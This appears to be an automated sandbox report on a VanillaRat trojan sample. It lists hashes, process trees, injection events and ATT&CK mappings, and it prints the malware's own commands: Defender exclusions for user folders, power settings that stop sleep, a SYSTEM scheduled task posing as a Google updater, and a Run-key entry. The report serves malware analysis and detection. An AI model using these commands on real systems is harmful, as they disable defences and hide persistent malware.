vanillarat | 4cf43fb3fd0c9512573a0f601f74101816706cc5e71470ab84e106cf29cbf589

General

Target

SynapseFromWish/start.bat
Size

52B
MD5

e078b3e0a3e8e4991e860eb41291c825
SHA1

29c7490038d188305c873d95794bb09a10c8e3fb
SHA256

5efe557c07c98300d0bd0b153f8e788cbbd26c25aa9eeef93848a2137bbf0782
SHA512

5881c68f281b2ab61a682b3bdf873aa2eb78f2f2dbdc7ae9a8317f6e9b2a6dc73c50c29af7d2d678f705b464985801bd6d9d7b58441cb9897d6fa851e4d9fc91

Score

10^/10

vanillarat persistence rat

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

release-v2.exe

description	pid	process	target process
PID 3340 created 3276	3340	release-v2.exe	Explorer.EXE
PID 3340 created 3276	3340	release-v2.exe	Explorer.EXE
PID 3340 created 3276	3340	release-v2.exe	Explorer.EXE
PID 3340 created 3276	3340	release-v2.exe	Explorer.EXE

VanillaRat
VanillaRat is an advanced remote administration tool coded in C#.
rat vanillarat

Vanilla Rat payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral6/memory/1616-0-0x00000000002F0000-0x0000000000312000-memory.dmp	vanillarat
C:\Users\Admin\AppData\Roaming\injector.exe	vanillarat
C:\Users\Admin\AppData\Roaming\injector.exe	vanillarat
C:\Users\Admin\AppData\Roaming\injector.exe	vanillarat

Drops file in Drivers directory 1 IoCs

Processes:

release-v2.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts release-v2.exe
Executes dropped EXE 1 IoCs

Processes:

injector.exe

pid process

624 injector.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	release-v2.exe

pid	process
624	injector.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

injector.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe"	injector.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

release-v2.exe

description pid process target process

PID 3340 set thread context of 796 3340 release-v2.exe dialer.exe

description	pid	process	target process
PID 3340 set thread context of 796	3340	release-v2.exe	dialer.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

release-v2.exepowershell.exedialer.exepowershell.exe

pid	process
3340	release-v2.exe
3340	release-v2.exe
680	powershell.exe
680	powershell.exe
680	powershell.exe
3340	release-v2.exe
3340	release-v2.exe
3340	release-v2.exe
3340	release-v2.exe
3340	release-v2.exe
3340	release-v2.exe
796	dialer.exe
796	dialer.exe
4704	powershell.exe
4704	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

injector.exepowershell.exedialer.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1616	injector.exe
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	796	dialer.exe
Token: SeDebugPrivilege	4704	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

cmd.exeinjector.exerelease-v2.execmd.exe

description	pid	process	target process
PID 3108 wrote to memory of 1616	3108	cmd.exe	injector.exe
PID 3108 wrote to memory of 1616	3108	cmd.exe	injector.exe
PID 3108 wrote to memory of 1616	3108	cmd.exe	injector.exe
PID 1616 wrote to memory of 624	1616	injector.exe	injector.exe
PID 1616 wrote to memory of 624	1616	injector.exe	injector.exe
PID 1616 wrote to memory of 624	1616	injector.exe	injector.exe
PID 3108 wrote to memory of 3340	3108	cmd.exe	release-v2.exe
PID 3108 wrote to memory of 3340	3108	cmd.exe	release-v2.exe
PID 3340 wrote to memory of 796	3340	release-v2.exe	dialer.exe
PID 2136 wrote to memory of 180	2136	cmd.exe	powercfg.exe
PID 2136 wrote to memory of 180	2136	cmd.exe	powercfg.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3108

C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
injector.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616

C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:624

C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
release-v2.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:180

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:540

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4272

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 612 -ip 612
1⤵
PID:2280

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 664 -ip 664
1⤵
PID:3796

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 60 -ip 60
1⤵
PID:3484

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xju0d1v2.pjj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\injector.exe
Filesize
114KB

MD5
311b5c55bcd7a7bf987d264a3904770e

SHA1
7df136430c19887e24cff480d6346dc9e75d2029

SHA256
680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504

SHA512
686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271

Download Submit
C:\Users\Admin\AppData\Roaming\injector.exe
Filesize
114KB

MD5
311b5c55bcd7a7bf987d264a3904770e

SHA1
7df136430c19887e24cff480d6346dc9e75d2029

SHA256
680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504

SHA512
686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271

Download Submit
C:\Users\Admin\AppData\Roaming\injector.exe
Filesize
114KB

MD5
311b5c55bcd7a7bf987d264a3904770e

SHA1
7df136430c19887e24cff480d6346dc9e75d2029

SHA256
680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504

SHA512
686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271

Download Submit
memory/60-67-0x00000286C4F20000-0x00000286C4F47000-memory.dmp

Filesize
156KB

Download
memory/532-73-0x000001878DB30000-0x000001878DB57000-memory.dmp

Filesize
156KB

Download
memory/612-58-0x0000024A27790000-0x0000024A277B7000-memory.dmp

Filesize
156KB

Download
memory/612-61-0x00007FFD59C2D000-0x00007FFD59C2E000-memory.dmp

Filesize
4KB

Download
memory/612-64-0x00007FFD59C2F000-0x00007FFD59C30000-memory.dmp

Filesize
4KB

Download
memory/612-55-0x0000024A27340000-0x0000024A27361000-memory.dmp

Filesize
132KB

Download
memory/624-17-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/624-19-0x0000000004B70000-0x0000000004B80000-memory.dmp

Filesize
64KB

Download
memory/624-20-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/664-60-0x000001A53C400000-0x000001A53C427000-memory.dmp

Filesize
156KB

Download
memory/664-62-0x00007FFD19C10000-0x00007FFD19C20000-memory.dmp

Filesize
64KB

Download
memory/664-75-0x00007FFD59C2F000-0x00007FFD59C30000-memory.dmp

Filesize
4KB

Download
memory/664-71-0x000001A53C400000-0x000001A53C427000-memory.dmp

Filesize
156KB

Download
memory/664-74-0x00007FFD59C2D000-0x00007FFD59C2E000-memory.dmp

Filesize
4KB

Download
memory/680-32-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp

Filesize
10.8MB

Download
memory/680-34-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp

Filesize
64KB

Download
memory/680-33-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp

Filesize
64KB

Download
memory/680-35-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp

Filesize
64KB

Download
memory/680-37-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp

Filesize
10.8MB

Download
memory/680-31-0x000001D8C1E30000-0x000001D8C1E52000-memory.dmp

Filesize
136KB

Download
memory/796-40-0x00007FFD59B90000-0x00007FFD59D85000-memory.dmp

Filesize
2.0MB

Download
memory/796-41-0x00007FFD58B40000-0x00007FFD58BFE000-memory.dmp

Filesize
760KB

Download
memory/952-70-0x00007FFD19C10000-0x00007FFD19C20000-memory.dmp

Filesize
64KB

Download
memory/952-66-0x000001ED297D0000-0x000001ED297F7000-memory.dmp

Filesize
156KB

Download
memory/1616-4-0x0000000004F30000-0x0000000004F40000-memory.dmp

Filesize
64KB

Download
memory/1616-0-0x00000000002F0000-0x0000000000312000-memory.dmp

Filesize
136KB

Download
memory/1616-3-0x0000000004D20000-0x0000000004DB2000-memory.dmp

Filesize
584KB

Download
memory/1616-5-0x0000000004DD0000-0x0000000004DDA000-memory.dmp

Filesize
40KB

Download
memory/1616-2-0x00000000051F0000-0x0000000005794000-memory.dmp

Filesize
5.6MB

Download
memory/1616-1-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1616-18-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/3340-21-0x00007FF6C4AE0000-0x00007FF6C50F7000-memory.dmp

Filesize
6.1MB

Download
memory/3340-69-0x00007FF6C4AE0000-0x00007FF6C50F7000-memory.dmp

Filesize
6.1MB

Download
memory/4704-43-0x0000020EEBF50000-0x0000020EEBF60000-memory.dmp

Filesize
64KB

Download
memory/4704-42-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp

Filesize
10.8MB

Download
memory/4704-49-0x0000020EEBF50000-0x0000020EEBF60000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads